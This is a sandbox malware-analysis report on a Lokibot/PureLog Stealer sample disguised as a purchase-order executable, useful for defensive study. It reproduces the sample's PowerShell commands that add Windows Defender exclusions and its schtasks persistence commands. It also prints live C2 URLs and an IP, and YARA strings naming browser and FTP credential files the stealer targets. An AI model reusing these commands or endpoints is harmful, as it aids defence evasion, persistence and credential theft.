Edit tour

Windows Analysis Report
PO-0Y9005373R664.exe

Overview

General Information

Sample name:	PO-0Y9005373R664.exe
Analysis ID:	1501076
MD5:	8c71713fd5663bcbe87118fc47de3ec5
SHA1:	059fd7d974e27726130b662af7cb5f45bac388b5
SHA256:	a977afa9d254b586f73b50eed60be03e124cee9bf9b1da069dc7d5fbcd24222b
Tags:	exe
Infos:

Detection

Lokibot, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Lokibot

Yara detected PureLog Stealer

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected aPLib compressed binary

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

PO-0Y9005373R664.exe (PID: 6964 cmdline: "C:\Users\user\Desktop\PO-0Y9005373R664.exe" MD5: 8C71713FD5663BCBE87118FC47DE3EC5)

powershell.exe (PID: 4528 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-0Y9005373R664.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 4024 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

powershell.exe (PID: 6352 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VvtddClQv.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 5660 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VvtddClQv" /XML "C:\Users\user\AppData\Local\Temp\tmpB962.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 4184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PO-0Y9005373R664.exe (PID: 2940 cmdline: "C:\Users\user\Desktop\PO-0Y9005373R664.exe" MD5: 8C71713FD5663BCBE87118FC47DE3EC5)

VvtddClQv.exe (PID: 3788 cmdline: C:\Users\user\AppData\Roaming\VvtddClQv.exe MD5: 8C71713FD5663BCBE87118FC47DE3EC5)

schtasks.exe (PID: 6476 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VvtddClQv" /XML "C:\Users\user\AppData\Local\Temp\tmpD806.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 1456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

VvtddClQv.exe (PID: 4780 cmdline: "C:\Users\user\AppData\Roaming\VvtddClQv.exe" MD5: 8C71713FD5663BCBE87118FC47DE3EC5)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://104.248.205.66/index.php/17008709"]}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
PO-0Y9005373R664.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\VvtddClQv.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x178a0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x4c6b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x134af:$des3: 68 03 66 00 00 0x178a0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1796c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000009.00000002.2939793723.0000000001428000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
00000000.00000002.1758190593.0000000005500000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000000.00000002.1745375841.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1745375841.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1745375841.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1745375841.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x178c0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1745375841.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x4c8b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1745375841.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x134cf:$des3: 68 03 66 00 00 0x178c0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1798c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000000.1684307388.00000000006C2000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1745375841.0000000003B73000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x84968:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x71d1b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x8055f:$des3: 68 03 66 00 00 0x84968:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x84a34:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x873c8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x7477b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x82fbf:$des3: 68 03 66 00 00 0x873c8:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x87494:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Process Memory Space: PO-0Y9005373R664.exe PID: 6964	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: PO-0Y9005373R664.exe PID: 6964	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: PO-0Y9005373R664.exe PID: 6964	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: PO-0Y9005373R664.exe PID: 6964	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x43ca:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x2d23a:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x8c13c:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: PO-0Y9005373R664.exe PID: 2940	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: VvtddClQv.exe PID: 3788	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: VvtddClQv.exe PID: 3788	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: VvtddClQv.exe PID: 3788	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: VvtddClQv.exe PID: 3788	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x318dc:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: VvtddClQv.exe PID: 4780	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: VvtddClQv.exe PID: 4780	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: VvtddClQv.exe PID: 4780	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x20a8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 45 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.PO-0Y9005373R664.exe.5500000.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.PO-0Y9005373R664.exe.2aa9d1c.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.2.VvtddClQv.exe.29b9d20.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.PO-0Y9005373R664.exe.5500000.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.PO-0Y9005373R664.exe.3d25e58.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.PO-0Y9005373R664.exe.3d25e58.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.PO-0Y9005373R664.exe.3e4a4d0.3.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.PO-0Y9005373R664.exe.3e4a4d0.3.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.PO-0Y9005373R664.exe.3e304b0.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.PO-0Y9005373R664.exe.3e4a4d0.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.PO-0Y9005373R664.exe.3e304b0.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.PO-0Y9005373R664.exe.3e304b0.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.PO-0Y9005373R664.exe.3e4a4d0.3.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.PO-0Y9005373R664.exe.3e4a4d0.3.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.PO-0Y9005373R664.exe.3e304b0.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.PO-0Y9005373R664.exe.3e4a4d0.3.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.PO-0Y9005373R664.exe.3e4a4d0.3.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.PO-0Y9005373R664.exe.3e4a4d0.3.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.PO-0Y9005373R664.exe.3e304b0.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.PO-0Y9005373R664.exe.3e4a4d0.3.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.PO-0Y9005373R664.exe.3e4a4d0.3.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.PO-0Y9005373R664.exe.3e4a4d0.3.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.PO-0Y9005373R664.exe.3e4a4d0.3.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.PO-0Y9005373R664.exe.3e4a4d0.3.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.PO-0Y9005373R664.exe.3e304b0.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.PO-0Y9005373R664.exe.3e304b0.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.PO-0Y9005373R664.exe.3e304b0.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.PO-0Y9005373R664.exe.3e304b0.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.PO-0Y9005373R664.exe.3e304b0.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.PO-0Y9005373R664.exe.3e304b0.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.PO-0Y9005373R664.exe.3e304b0.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.PO-0Y9005373R664.exe.3e304b0.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
14.2.VvtddClQv.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
14.2.VvtddClQv.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
14.2.VvtddClQv.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.VvtddClQv.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
14.2.VvtddClQv.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
14.2.VvtddClQv.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
14.2.VvtddClQv.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
14.2.VvtddClQv.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
14.2.VvtddClQv.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
14.2.VvtddClQv.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
14.2.VvtddClQv.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.VvtddClQv.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
